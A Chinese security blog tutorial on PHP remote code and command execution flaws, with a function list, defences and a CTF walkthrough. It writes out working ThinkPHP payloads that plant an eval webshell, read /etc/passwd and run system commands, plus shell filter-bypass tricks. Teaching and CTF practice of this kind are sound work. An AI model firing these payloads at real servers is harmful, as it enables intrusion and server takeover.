REC代码及命令执行漏洞

已于 2022-08-05 11:01:18 修改
阅读量2.7k 收藏 12
点赞数 5
分类专栏: 渗透测试 文章标签: web安全
于 2022-03-21 09:55:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangyongkang666/article/details/123627980
版权

RCE代码及命令执行漏洞

1.RCE介绍

全称:remote command/code execute

分为远程命令执行远程代码执行

1.命令执行漏洞: 直接调用操作系统命令

  1. 代码执行漏洞: 靠执行脚本代码调用操作系统命令

​ 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。

在这里插入图片描述

2.代码执行漏洞

1.漏洞介绍

​ PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行。该漏洞主要存在于eval()、assert()、preg_replace()、call_user_func()、array_map()以及动态函数中。

2.代码执行原理:

应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、assert、shell_exec、passthru、popen、proc_popen

escapeshellcmd、pcntl_exec等,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行***,这就是命令执行漏洞。以上函数主要也在webshell中用的多,实际上在正常应用中差别不太大,用得最多的还是前三个

3.代码执行漏洞危害

  • 执行任意代码
  • 向网站写WebShell
  • 控制整个网站甚至服务器

4.函数介绍

1. eval()

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

在这里插入图片描述

假设对方存在这样的一个代码执行漏洞 就可以用代码去攻击它

通过evel去上传一个webshell,然后去控制它

2. assert()

普通调用

//?a=phpinfo()
<?php assert($_POST['a']);?>

assert 函数支持动态调用

//?a=phpinfo()
<?php
$a = 'assert';
$a($_POST['a']);
?

php官方在php7中更改了 assert 函数。在php7.0.29之后的版本不支持动态调用。

<?php
$a = 'assert';
$a(phpinfo());
?>
//成功执行phpinfo()

3.preg_replace函数

此函数的作用是对一个字符串进行正则处理

mixed preg_replace ( mixed $ pattern , mixed $ replacement , mixed $ subject [, int $ limit = -1 [, int &$ count ]] )

…更多百度

5.代码执行漏洞防御:

  1. 尽量少用执行命令的函数或者直接禁用`
  2. 参数值尽量使用引号包括
  3. 在使用动态函数之前,确保使用的函数是指定的函数之一
  4. 在进入执行命令的函数/方法之前,对参数进行过滤,对敏感字符进行转义
  5. 能使用脚本解决的工作,不要调用其他程序处理。尽量少用执行命令的函数,并在disable_functions中禁用
  6. 对于可控点是程序参数的情况下,使用escapeshellcmd函数进行过滤,对于可控点是程序参数值的情况下,使用escapeshellarg函数进行过滤
  7. 参数的值尽量使用引号包裹,并在拼接前调用addslashes进行转义而针对由特定第三方组件引发的漏洞,我们要做的就是及时打补丁,修改安装时的默认配置。
  8. 对于eval( )函数一定要保证用户不能轻易接触eval的参数或者用正则严格判断输入的数据格式。
  9. 对于preg_replace放弃使用e修饰符。如果必须要用e修饰符,请保证第二个参数中,对于正则匹配出的对象,用单引号包裹 。

6.漏洞利用

# 一般找CMS相应版本漏洞,如ThinkPHP2.1

* 一句话
  http://www.xxx.com/News/detail/id/{${@eval($_POST[aa])}}
* 得到当前路径
  http://www.xxx.com/News/detail/id/{${print(getcwd()))}}
* 读文件
  http://www.xxx.com/News/detail/id/{${exit(var_dump(file_get_contents($_POST['f'])))}}
  POST的数据为:f=/etc/passwd
* 写shell
  http://www.xxx.com/News/detail/id/{${exit(var_dump(file_put_contents($_POST['f'],$_POST[d])))}}
  POST的数据为:f=1.php&d=<?php @eval($_POST['aa'])?>

3.命令执行漏洞

1.命令执行漏洞简介

​ 用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许使用者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码

2.命令执行原理:

在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令

3.系统命令执行函数

1. System:system函数可以用来执行一个外部的应用程序并将相应的执行结果输出,函数原型如下:
 
system(command,return_var)

其中,command是要执行的命令,return_var存放执行命令的执行后的状态值。

2. Exec:exec函数可以用来执行一个外部的应用程序

exec (command, output, return_var)

其中,command是要执行的命令,output是获得执行命令输出的每一行字符串,return_var存放执行命令后的状态值

 3.Passthru:passthru函数可以用来执行一个UNIX系统命令并显示原始的输出,当UNIX系统命令的输出是二进制的数据,并且需要直接返回值给浏览器时,需要使用passthru函数来替代system与exec函数。Passthru函数原型如下:

passthru (command, return_var)

其中,command是要执行的命令,return_var存放执行命令后的状态值。

4. Shell_exec:执行shell命令并返回输出的字符串,函数原型如下:

 shell_exec (command)

其中,command是要执行的命令。

system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()

4.Windows系统命令拼接

“|”:管道符,前面命令标准输出,后面命令的标准输入。例如:help |more
“&” commandA & commandB 先运行命令A,然后运行命令B
“||” commandA || commandB 运行命令A,如果失败则运行命令B
“&&” commandA && commandB 运行命令A,如果成功则运行命令B

绕过空格

$IFS$1      //$1改成$加其他数字都行,都能当作空格来用

{cat,flag.txt}

cat${IFS}flag.txt

cat$IFS$9flag.txt

cat<flag.txt

cat<>flag.txt

4.实例

攻防世界web进阶区 题目:php_rce

在这里插入图片描述

看到这里,没有思路直接搜 ThinkPHP V5漏洞

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=

在url后添加?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

发现flag文件

在url后添加?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1](http://www.manongjc.com/detail/25-bdsktbzcdlhfjwe.html#)=cat /flag

获得flag

在这里插入图片描述

参考博客:

https://blog.csdn.net/mochu7777777/article/details/104842420?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-1.pc_relevant_default&spm=1001.2101.3001.4242.2&utm_relevant_index=4

https://blog.csdn.net/mochu7777777/article/details/104842420?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-1.pc_relevant_default&spm=1001.2101.3001.4242.2&utm_relevant_index=4
makven60
关注
  • 5
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 1119
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
REC——命令执行漏洞
2301_76160896的博客
12-04 786
命令注入漏洞详解
Weblogic WLS组件REC漏洞(CVE-2017-10271)利用脚本
09-30
Weblogic wls-wsat组件反序列化漏洞(CVE-2017-10271)利用脚本。 命令执行并回显 直接上传shell 在linux下weblogic 10.3.6.0测试OK 使用方法及参数 python weblogic_wls_wsat_exp.py -t 172.16.80.131:7001 usage: weblogic_wls_wsat_exp.py [-h] -t TARGET [-c CMD] [-o OUTPUT] [-s SHELL] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET weblogic ip and port(eg -> 172.16.80.131:7001) -c CMD, --cmd CMD command to execute,default is "id" -o OUTPUT, --output OUTPUT output file name,default is output.txt -s SHELL, --shell SHELL local jsp file name to upload,and set -o xxx.jsp
RCE(远程命令/代码执行漏洞)原理及复现(转载)
weixin_48494542的博客
08-25 1068
本文转自行云博客https://www.xy586.top/ 作用 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 原理 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上。一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如果,设计者在完成该功能时,没有做严格的安全
rce代码命令执行漏洞与 文件包含
m0_61786761的博客
08-06 596
filename=file:///D:/phpstudy/PHPTutourial/www/1.txt ->file需要完整路径才能执行。③设置访问权限:限制当前中间件所在用户的访问权限,例如;②限制访问区域:php.ini 中设置 open_basedir 来限制用户访问文件的活动范围等;3.参考网址:https://cnblogs.com/lyxsalyd/p/12607769.html。参考:https://www.cnblogs.com/endust/p/11804767.html。...
SonicWall Secure Mobile Access REC漏洞分析
qq_40466372的博客
02-16 374
SonicWall Secure Mobile Access远程代码执行漏洞
csrf,ssrf,rce,文件包含漏洞,文件上传漏洞
nightswatch1的博客
04-21 3380
21 CSRF与SSRF漏洞 21.1课程大纲 参考链接: 【小迪安全】Day29web漏洞-CSRF及SSRF漏洞案例讲解-哔哩哔哩(bilibili.com) 正在上传…重新上传取消 参考①:cnblogs.com/dogecheng/p/11583412.thml 21.2CSRF...
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
首先,我们要理解什么是远程代码执行漏洞。在计算机安全领域,RCE漏洞允许攻击者在没有权限的情况下,在目标系统上执行任意代码。这种漏洞往往具有极高的危险性,因为它可能导致数据泄露、系统瘫痪甚至完全控制目标...
小米平板2一键REC及ROOT工具.zip
11-19
【小米平板2一键REC及ROOT工具】 在Android设备中,"REC"通常指的是"Recovery Mode",这是一个系统恢复环境,允许用户执行如备份、恢复、安装更新或进行高级系统修改等操作。"ROOT"则是指获取设备的超级用户权限,...
rec.rar_rec
09-20
".rar_rec"可能是用户自定义的标记,意味着这可能是关于“计数器”功能的源代码记录。 描述中的“计数器算法”是一个关键概念,它通常涉及到编程中的计数或统计功能。计数器算法可以用于各种目的,如跟踪程序执行...
红米1S移动版第三方rec下载及刷入教程
02-14
### 红米1S移动版第三方REC下载及刷入教程 #### 一、前言 随着智能手机功能的不断丰富与强大,用户对于手机的定制化需求也日益增长。为了满足这种需求,许多用户选择为自己的设备安装第三方Recovery(简称REC),...
RCE代码命令执行漏洞
m0_51468027的博客
02-13 7019
  在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 一、代码执行 1、脚本 (1)PHP   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。   常见代码执行函数,如 eval()、assert()、preg_replace()、create_function
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
REC代码命令执行代码全解
qq_45750691的博客
08-17 1530
第30天—REC代码命令执行代码全解 ​ 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞代码执行 代码执行的危害 执行脚本代码 脚本能干嘛 它就能干嘛 案例(PHP环境) 假设对方存在这样的一个代码执行漏洞 就可以用代码去攻击它 通过evel去上传一个webshell,然后去控制它 <?
远程命令/代码执行漏洞(RCE)总结
qq_45521281的博客
04-17 7092
文章目录介绍PHP命令执行函数代码执行函数命令拼接符命令执行的一些绕过技巧绕过str_replace()函数空格被过滤的绕过用编码来绕过URL编码绕过Base64编码绕过Hex编码绕过Oct编码绕过:偶读拼接绕过(黑名单绕过)花括号{command,}的别样用法无回显的命令执行方法一:反弹shell方法二:msf反向回连利用RCE反弹Shellnetcat 一句话反弹Shellbash反弹shel...
RCE远程代码执行漏洞(原理、危害、拼接字符、DVWA、pikachu、防御)
m0_61506558的博客
08-07 1191
什么是远程代码执行
RCE(‌Remote Code Execution,‌远程代码执行)‌
最新发布
2303_77293157的博客
07-15 325
‌这种攻击方式通常涉及到系统或应用程序的安全漏洞,‌使得攻击者能够注入或上传恶意代码,‌并在受害者的系统上执行这些代码。是 PHP 中另一个用于执行系统命令的函数,它的作用是将命令的输出直接传递给调用者,而不是将输出作为 PHP 字符串返回。是 PHP 中用于与外部程序进行交云的一个非常有用的函数。它的作用是打开一个流到外部程序,这个流可以是程序的标准输入或标准输出。函数不会捕获命令的输出,而是直接在服务器上执行命令,并且将命令的输出作为数组返回。函数执行命令的输出将直接显示在调用它的脚本的输出中;
REC远程命令代码执行漏洞
weixin_44603865的博客
03-13 300
小知识点:根据页面的功能去判断可能存在的漏洞,例如可能需要进行增删CRUD 的页面就可能有 SQL 漏洞。通过漏洞扫描工具扫描出可能存在的漏洞,浏览器找到相关漏洞的破解 payload。根据所用代码语言文件种类区别开,一般有 Java,Python,Php 等。即phpinfo()作为 php 代码进行运行,显示 php 数据。通过网站的参数值来改变变量值, php 文件下的任一参数。也可以利用 php 创建文件并写入服务器,例创建代码。根据使用的函数的不同从而形成不同的漏洞,比如。当访问这个页面的时候。
RCE远程命令代码执行漏洞
qq_45680080的博客
11-13 1444
RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提...
什么命令可以 查看安卓设备的rec路径
06-03
可以通过在 Android 设备的终端中输入以下命令来查看 recovery 分区的路径: ``` cat /proc/mounts | grep recovery ``` 该命令会在终端中输出 recovery 分区的挂载信息,其中包括 recovery 分区的路径和挂载点。请注意,该命令需要在已经获取 root 权限的 Android 设备中运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值